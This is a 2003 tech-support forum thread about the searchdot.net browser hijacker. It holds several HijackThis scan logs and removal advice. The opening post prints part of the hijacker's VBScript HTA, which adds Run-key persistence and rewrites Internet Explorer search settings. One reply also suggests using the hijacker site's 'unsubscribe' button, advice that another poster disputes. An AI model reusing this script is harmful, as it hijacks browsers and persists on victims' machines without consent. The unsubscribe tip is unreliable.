Tom's Guide | Tom's Hardware | Tom's Games
 |
 |
 |
When i booted my computer i found a strange file called "1.hta" on my desktop.
i opened it in notepad and this is the first few lines of it....
<script language=vbs>
Set er=CreateObject("Scripting.FileSystemObject")
Set Shl = CreateObject("WScript.Shell")
ddd = Shl.SpecialFolders("Fonts") + "\" + "msoffice.hta"
Shl.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Msoffice", ddd
Shl.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Msoffice", ddd
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Bar", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Use Search Asst", "no"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\SearchUrl\", "http://www.searchdot.net"
is it safe to delete this?
That's the latest hijacker..'searchdot.net'.
Download 'Hijack This!'. Unzip, doubleclick HijackThis.exe, and hit "Scan".
When the scan is finished, click "Save Log", and copy and paste it in a reply.
HijackThis!
0 
I am having the same searchdot problem. I downloaded Hijackthis, ran the scan, and deleted all files with "searchdot" and "searchdv" in them, and any others recommended by Tom41 (if I had them on my Hijackthis scan - I did not have all the ones that phldude had) and am left with the scan below. I have done this a few times and rebooted my computer each time and the searchdv files reappear. Please help! Thanks.This is the Hijackthis scan after I deleted the searchdot and searchdv files:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sony.com/vaiopeople
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sony.com/vaiopeople
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://www.sony.com/vaiopeople
O1 - Hosts: 209.66.114.130 sitefinder.verisign.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: WinShow module - {6CC1C918-AE8B-4373-A5B4-28BA1851E39A} - C:\Documents and Settings\Owner\Application Data\winshow\winshow.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] ICO.exe
O4 - HKLM\..\Run: [ezShieldProtector for Px] C:\WINDOWS\System32\ezSP_Px.exe
O4 - HKLM\..\Run: [ZTgServerSwitch] c:\program files\support.com\client\lserver\server.vbs
O4 - HKLM\..\Run: [HKSERV.EXE] C:\Program Files\Sony\HotKey Utility\HKserv.exe
O4 - HKLM\..\Run: [VAIOSurvey] c:\program files\sony\vaio survey\surveysa.exe
O4 - HKLM\..\Run: [CreateCD_Reminder] C:\WINDOWS\Sonysys\VAIO Recovery\reminder.exe
O4 - HKLM\..\Run: [VAIO Recovery] C:\WINDOWS\Sonysys\VAIO Recovery\PartSeal.exe
O4 - HKLM\..\Run: [McAgentexe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [McUpdateexe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [VirusScan Online] c:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
O4 - HKLM\..\Run: [sys] regedit /s C:\WINDOWS\sys.reg
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\MsnMsgr.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Global Startup: Billminder.lnk = C:\Program Files\Quicken\billmind.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.exe
O4 - Global Startup: PowerPanel.lnk = ?
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O4 - Global Startup: Quicken Startup.lnk = C:\Program Files\Quicken\QWDLLS.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: MoneySide (HKLM)
O14 - IERESET.INF: START_PAGE_URL=http://www.sony.com/vaiopeople
O16 - DPF: Yahoo! Chat - http://us.chat1.yimg.com/us.yimg.com/i/chat/applet/c381/chat.cab
O16 - DPF: {2B323CD9-50E3-11D3-9466-00A0C9700498} (Yahoo! Audio Conferencing) - http://us.chat1.yimg.com/us.yimg.com/i/chat/applet/v45/yacscom.cab
O16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.ofoto.com/downloads/BUM/BUM_WIN_IE_1/axofupld.cab
0
Fix these entries with Hijack and reboot:
O1 - Hosts: 209.66.114.130 sitefinder.verisign.com
O2 - BHO: WinShow module - {6CC1C918-AE8B-4373-A5B4-28BA1851E39A} - C:\Documents and Settings\Owner\Application Data\winshow\winshow.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O4 - HKLM\..\Run: [sys] regedit /s C:\WINDOWS\sys.regAfter rebooting delete C:\WINDOWS\sys.reg
0
Having the same problems. Please help!
R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.crooder.com/search/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = about:blank
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.searchdot.net
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = C:\WINDOWS\system32\search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.crooder.com/search/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.searchdot.net
O2 - BHO: (no name) - {AE7CD045-E861-484f-8273-0445EE161910} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\ACROBAT\ACROIEFAVCLIENT.DLL
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\ACROBAT\ACROIEFAVCLIENT.DLL
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\MOUSEW~1\SYSTEM\EM_EXEC.exe
O4 - HKLM\..\Run: [RxMon] C:\Program Files\Dell\Resolution Assistant\Common\bin\RxMon9x.exe
O4 - HKLM\..\Run: [MadExe] C:\PROGRAM FILES\DELL\RESOLUTION ASSISTANT\COMMON\BIN\LaunchRA.exe -boot
O4 - HKLM\..\Run: [Microsoft IntelliType Pro] "C:\Program Files\Microsoft Hardware\Keyboard\speedkey.exe"
O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe
O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers
O4 - HKLM\..\Run: [MotiveMonitor] C:\Program Files\Motive\motmon.exe
O4 - HKLM\..\Run: [Hidserv] Hidserv.exe run
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~1\NAVAPW32.exe /LOADQUIET
O4 - HKLM\..\Run: [InstallShieldDelOnReboot] E:\Setup.exe /nSin
O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\evntsvc.exe -osboot
O4 - HKLM\..\Run: [QuickTime Task] C:\WINDOWS\SYSTEM\QTTASK.exe
O4 - HKLM\..\Run: [OneTouch Monitor] C:\PROGRA~1\VISION~1\OneTouchMon.exe
O4 - HKLM\..\Run: [Msoffice] C:\WINDOWS\FONTS\msoffice.hta
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [SSDPSRV] C:\WINDOWS\SYSTEM\ssdpsrv.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKCU\..\Run: [MSMSGS] C:\PROGRA~1\MESSEN~1\msmsgs.exe /background
O4 - HKCU\..\Run: [MoneyAgent] "C:\Program Files\Microsoft Money\System\Money Express.exe"
O4 - HKCU\..\Run: [PPWebCap] C:\PROGRA~1\SCANSOFT\PAPERP~1\PPWebCap.exe
O4 - HKCU\..\Run: [Msoffice] C:\WINDOWS\FONTS\msoffice.hta
O4 - Startup: Resolution Assistant.lnk = C:\Program Files\Dell\Resolution Assistant\MotiveAssistant\bin\matcli.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.exe
O4 - Startup: Acrobat Assistant.lnk = C:\Program Files\Adobe\Acrobat 6.0\Distillr\acrotray.exe
O4 - Startup: NEC SuperScript 870 Status Monitor.lnk = C:\WINDOWS\ASISTAT.exe
O4 - Startup: SideACT!.lnk = C:\Program Files\Symantec\ACT\SideACT.exe
O4 - Startup: ACT! Speed Loader.lnk = C:\Program Files\Symantec\ACT\ACTLDR.exe
O4 - Startup: America Online 6.0 Tray Icon.lnk.disabled
O4 - Startup: Microsoft Works Calendar Reminders.lnk.disabled
O4 - Startup: Check for OneTouch Updates.lnk = C:\Program Files\Visioneer OneTouch\WiseUpdt.exe
O4 - Startup: reminder-ScanSoft Product Registration.lnk = C:\Program Files\ScanSoft\PaperPort\Config\Ereg\REMIND32.exe
O8 - Extra context menu item: &Define - C:\Program Files\Common Files\Microsoft Shared\Reference 2001\A\ERS_DEF.HTM
O8 - Extra context menu item: Look Up in &Encyclopedia - C:\Program Files\Common Files\Microsoft Shared\Reference 2001\A\ERS_ENC.HTM
O8 - Extra context menu item: &Google Search - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmsearch.html
O8 - Extra context menu item: Cac&hed Snapshot of Page - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmcache.html
O8 - Extra context menu item: Si&milar Pages - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmsimilar.html
O8 - Extra context menu item: Backward &Links - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmbacklinks.html
O8 - Extra context menu item: Translate Page - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmtrans.html
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: MSN Messenger Service (HKLM)
O9 - Extra button: Encarta Encyclopedia (HKLM)
O9 - Extra 'Tools' menuitem: Encarta Encyclopedia (HKLM)
O9 - Extra button: Define (HKLM)
O9 - Extra 'Tools' menuitem: Define (HKLM)
O9 - Extra button: Real.com (HKLM)
O9 - Extra button: Dell Home (HKCU)
O14 - IERESET.INF: START_PAGE_URL=http://www.my.delleworks.com
O16 - DPF: {DF6A0F17-0B1E-11D4-829D-00C04F6843FE} (Microsoft Office Template Gallery) - http://officeupdate.microsoft.com/TemplateGallery/downloads/outc.cab
O16 - DPF: {CC05BC12-2AA2-4AC7-AC81-0E40F83B1ADF} (Live365Player Class) - http://www.live365.com/players/play365.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {B2BE75F3-9197-11CF-ABF4-08000996E931} (Autodesk WHIP! Control) - http://www.leeson.com/whip.cab
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1540.g.akamai.net/7/1540/52/20020323/qtinstall.info.apple.com/qt505/us/win/QuickTimeInstaller.exe
O16 - DPF: {A1DC3241-B122-195F-B21A-000000000000} - http://pluginaccess.com/cd/Browser_Plugin.cab
O16 - DPF: {7CF052DE-C74F-421B-B04A-3B3037EF5887} (CCMPGui Class) - http://64.124.45.181/chaincast/proxy/CCMP.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/ansi/iuctl.CAB?37888.3191550926
O16 - DPF: {2B323CD9-50E3-11D3-9466-00A0C9700498} (Yahoo! Audio Conferencing) - http://us.chat1.yimg.com/us.yimg.com/i/chat/applet/v45/yacscom.cab
O16 - DPF: Yahoo! Chat - http://us.chat1.yimg.com/us.yimg.com/i/chat/applet/c381/chat.cab
O16 - DPF: {E504EE6E-47C6-11D5-B8AB-00D0B78F3D48} (Yahoo! Webcam Viewer Wrapper) - http://chat.yahoo.com/cab/yvwrctl.cab
O16 - DPF: {1663ed61-23eb-11d2-b92f-008048fdd814} (MeadCo ScriptX 5.5 Basic) - http://www.isqft.com/Applets/ScriptX/ScriptX.cab
O19 - User stylesheet: c:\windows\java\my.css
0
I am having the same type of troubles with searchdot.net taking over my homepage on Windows ME. I ran Adware then Hijackthis and this is what I got. I am not a computor wiz so any help would be good.
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchURL = http://www.allcybersearch.com/ie/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.searchdot.net
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
O1 - Hosts: 216.65.115.190 auto.search.msn.com
O3 - Toolbar: @msdxmLC.dll,-1@1033,&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [IrMon] irmon.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\GRISOFT\AVG6\avgcc32.exe /STARTUP
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\LOGITECH\MOUSEW~1\SYSTEM\EM_EXEC.exe
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [Msoffice] C:\WINDOWS\FONTS\msoffice.hta
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [Avgserv9.exe] C:\PROGRA~1\GRISOFT\AVG6\Avgserv9.exe
O4 - HKCU\..\Run: [Washer] C:\Program Files\Washer\washer.exe /0
O4 - HKCU\..\Run: [XiD] "C:\PROGRAM FILES\INTERNET EXPLORER\mmx.exe"
O4 - HKCU\..\Run: [Msoffice] C:\WINDOWS\FONTS\msoffice.hta
O4 - Startup: America Online 7.0 Tray Icon.lnk = C:\Program Files\America Online 7.0b\aoltray.exe
O4 - Startup: Corel Desktop Application Director 8.LNK = C:\Corel\Suite8\Programs\DAD8.exe
O4 - Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.exe
O4 - Startup: SGETask.exe
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: MSN Messenger Service (HKLM)
O9 - Extra button: Real.com (HKLM)
0
i have the problem with searchdot.net . i dont knw which files i shall delete in the list after i scanned with hijackthis. please help me. thanks
Leong
Logfile of HijackThis v1.97.2
Scan saved at 9:51:40 PM, on 10/15/2003
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)Running processes:
D:\WINNT\System32\smss.exe
D:\WINNT\system32\winlogon.exe
D:\WINNT\system32\services.exe
D:\WINNT\system32\lsass.exe
D:\WINNT\system32\svchost.exe
D:\WINNT\system32\spoolsv.exe
D:\PROGRA~1\Grisoft\AVG6\avgserv.exe
D:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
D:\WINNT\System32\svchost.exe
D:\WINNT\system32\hidserv.exe
D:\WINNT\system32\regsvc.exe
D:\WINNT\system32\MSTask.exe
D:\WINNT\wanmpsvc.exe
D:\WINNT\System32\WBEM\WinMgmt.exe
D:\WINNT\System32\mspmspsv.exe
D:\WINNT\system32\svchost.exe
D:\WINNT\System32\ZipToA.exe
D:\WINNT\system32\svcinit.exe
D:\WINNT\Explorer.exe
D:\Program Files\Grisoft\AVG6\avgcc32.exe
D:\Program Files\Iomega\DriveIcons\ImgIcon.exe
D:\Program Files\Common Files\Real\Update_OB\realsched.exe
D:\WINNT\system32\Rundll32.exe
D:\Program Files\AIM95\aim.exe
D:\Program Files\Yahoo!\Messenger\ypager.exe
D:\Program Files\Alset\HelpExpress\J-Leong Tew\HXIUL.exe
D:\Program Files\Alset\HelpExpress\J-Leong Tew\Client\HelpExp.exe
D:\Program Files\Alset\HelpExpress\J-Leong Tew\Client\PrintMonitor.exe
D:\Program Files\America Online 7.0a\aoltray.exe
D:\WINNT\emsw.exe
D:\Program Files\Belkin\Bluetooth Software\BTTray.exe
D:\Program Files\Network ICE\BlackICE\blackice.exe
D:\Program Files\Belkin\Bluetooth Software\BTStackServer.exe
D:\Program Files\Internet Explorer\iexplore.exe
D:\PROGRA~1\WinZip\winzip32.exe
D:\DOCUME~1\J-LEON~1.LEO\LOCALS~1\Temp\HijackThis.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.searchdot.net
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page_bak = http://yahoo.com/
R3 - Default URLSearchHook is missing
O2 - BHO: HTML Source Editor - {086AE192-23A6-48D6-96EC-715F53797E85} - D:\WINNT\System32\DReplace.dll
O2 - BHO: Bugnosis - {3A6514CD-A457-11D4-8AF3-000102686B79} - D:\Program Files\Bugnosis\WebBug.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - d:\winnt\googletoolbar.dll
O3 - Toolbar: (no name) - {8FB0F3E2-5193-11d7-9F88-0050FC5441CB} - (no file)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINNT\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - d:\winnt\googletoolbar.dll
O3 - Toolbar: (no name) - {F61F5A6F-8886-4A4E-8B6D-8F86B40DB4EA} - (no file)
O3 - Toolbar: Bugnosis - {930E4DE1-973D-42D6-BF6E-6788E06BD003} - D:\Program Files\Bugnosis\WebBug.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Mirabilis ICQ] D:\Program Files\ICQ\NDetect.exe
O4 - HKLM\..\Run: [AVG_CC] D:\Program Files\Grisoft\AVG6\avgcc32.exe /startup
O4 - HKLM\..\Run: [Iomega Startup Options] D:\Program Files\Iomega\Common\ImgStart.exe
O4 - HKLM\..\Run: [Iomega Drive Icons] D:\Program Files\Iomega\DriveIcons\ImgIcon.exe
O4 - HKLM\..\Run: [Ink Monitor] D:\Program Files\EPSON\Ink Monitor\InkMonitor.exe
O4 - HKLM\..\Run: [System Tray] D:\Documents and Settings\J-Leong Tew.LEONG\Local Settings\Temporary Internet Files\Content.IE5\ER0AX2HM\password.pif
O4 - HKLM\..\Run: [system] C:\systemsearch.hta
O4 - HKLM\..\Run: [Windows Update] D:\WINNT\winupdate.exe
O4 - HKLM\..\Run: [TkBellExe] "D:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [AxFilter] Rundll32.exe D:\WINNT\DOWNLO~1\AxFilter.dll,Rundll32
O4 - HKLM\..\Run: [26@ZHCB49J3LMC] D:\WINNT\System32\Frcpw5.exe
O4 - HKLM\..\Run: [OrbitUpdate] D:\Program Files\Orbit\update.exe
O4 - HKLM\..\Run: [OrbitView] D:\Program Files\Orbit\view.exe
O4 - HKLM\..\Run: [emsw.exe] D:\WINNT\emsw.exe
O4 - HKLM\..\Run: [Msoffice] D:\WINNT\Fonts\msoffice.hta
O4 - HKCU\..\Run: [AIM] D:\Program Files\AIM95\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [Yahoo! Pager] D:\Program Files\Yahoo!\Messenger\ypager.exe -quiet
O4 - HKCU\..\Run: [System Tray] D:\Documents and Settings\J-Leong Tew.LEONG\Local Settings\Temporary Internet Files\Content.IE5\ER0AX2HM\password.pif
O4 - HKCU\..\Run: [Rurs] D:\Documents and Settings\J-Leong Tew.LEONG\Application Data\scee.exe
O4 - HKCU\..\Run: [HXIUL.EXE] D:\Program Files\Alset\HelpExpress\J-Leong Tew\HXIUL.exe
O4 - HKCU\..\Run: [HELPEXP.EXE] D:\Program Files\Alset\HelpExpress\J-Leong Tew\Client\HelpExp.exe
O4 - HKCU\..\Run: [emsw.exe] D:\WINNT\emsw.exe
O4 - HKCU\..\Run: [Msoffice] D:\WINNT\Fonts\msoffice.hta
O4 - HKCU\..\RunOnce: [ICQ] D:\Program Files\ICQ\ICQ.exe -trayboot
O4 - Global Startup: Microsoft Office.lnk = D:\Program Files\Microsoft Office\Office\OSA9.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = D:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: EPSON Status Monitor 3 Environment Check 2.lnk = D:\WINNT\system32\spool\drivers\w32x86\3\E_SRCV02.exe
O4 - Global Startup: America Online 7.0 Tray Icon.lnk = D:\Program Files\America Online 7.0a\aoltray.exe
O4 - Global Startup: BTTray.lnk = D:\Program Files\Belkin\Bluetooth Software\BTTray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = D:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: BlackICE PC Protection.lnk = D:\Program Files\Network ICE\BlackICE\blackice.exe
O8 - Extra context menu item: &Google Search - res://D:\WINNT\GoogleToolbar.dll/cmsearch.html
O8 - Extra context menu item: Backward &Links - res://D:\WINNT\GoogleToolbar.dll/cmbacklinks.html
O8 - Extra context menu item: Cac&hed Snapshot of Page - res://D:\WINNT\GoogleToolbar.dll/cmcache.html
O8 - Extra context menu item: Coupons - file://D:\Program Files\couponsandoffers\System\Temp\couponsandoffers_script0.htm
O8 - Extra context menu item: Si&milar Pages - res://D:\WINNT\GoogleToolbar.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page - res://D:\WINNT\GoogleToolbar.dll/cmtrans.html
O9 - Extra 'Tools' menuitem: MaxSpeed (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: ICQ Pro (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: AIM (HKLM)
O9 - Extra button: Real.com (HKLM)
O16 - DPF: {737D14F8-4090-11D4-AE0E-0010830243BD} (SysVerChk Control) - http://pointa.autodesk.com/portal/lang/neutral/SysVerChk.ocx
O16 - DPF: {78AF2F24-A9C3-11D3-BF8C-0060B0FCC122} (AcDcToday Control) - file://D:\Program Files\ACAD2000\AcDcToday.ocx
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37902.7966319444
O16 - DPF: {AE563720-B4F5-11D4-A415-00108302FDFD} (NOXLATE-BANR) - http://pointa.autodesk.com/portal/lang/enu/InstBanr.Ocx
O16 - DPF: {C6637286-300D-11D4-AE0A-0010830243BD} (InstaFred) - http://pointa.autodesk.com/portal/lang/enu/InstFred.Ocx
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {F281A59C-7B65-11D3-8617-0010830243BD} (AcPreview Control) - file://D:\Program Files\ACAD2000\AcPreview.ocx
0
Forget Hijackthis. It works with Searchdot only for the session.
Scroll the Searchdot Page to end, there you'll find an unsubscribe Button. Click it, enter YES and reboot your system.
No more Searchdot
greets
Tom
0
Hijack This is the best tool available for removing unknown threats. A bad advice would be to go to the site of this "thing" and leave your e-mail and/or IP.
DLanglitz
I sugges´t you download AdAware6 181 and run a scan. A new ref-file was released only an hour ago that will take care of most of those items, don´t forget to use the webupdate before scanning. When you have done this, please post another HJT log and we´ll look into it.
Regards
Die Hard
0
Logfile of HijackThis v1.97.3
Scan saved at 6:55:53 PM, on 31/10/2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.exe
C:\windows\system32\cmx32.exe
C:\WINDOWS\System32\Atiptaxx.exe
C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe
C:\PROGRA~1\PANICW~1\POP-UP~1\dpps2.exe
C:\WINDOWS\SYSTEM32\RUNDLL32.exe
C:\Program Files\Athan\Athan.exe
C:\windows\system32\msinstall\dlu32\dluca\dluca.exe
C:\WINDOWS\wt\updater\wcmdmgr.exe
C:\WINDOWS\System32\msblast.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S0BIC1.exe
C:\WINDOWS\System32\rundll32.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\System32\devldr32.exe
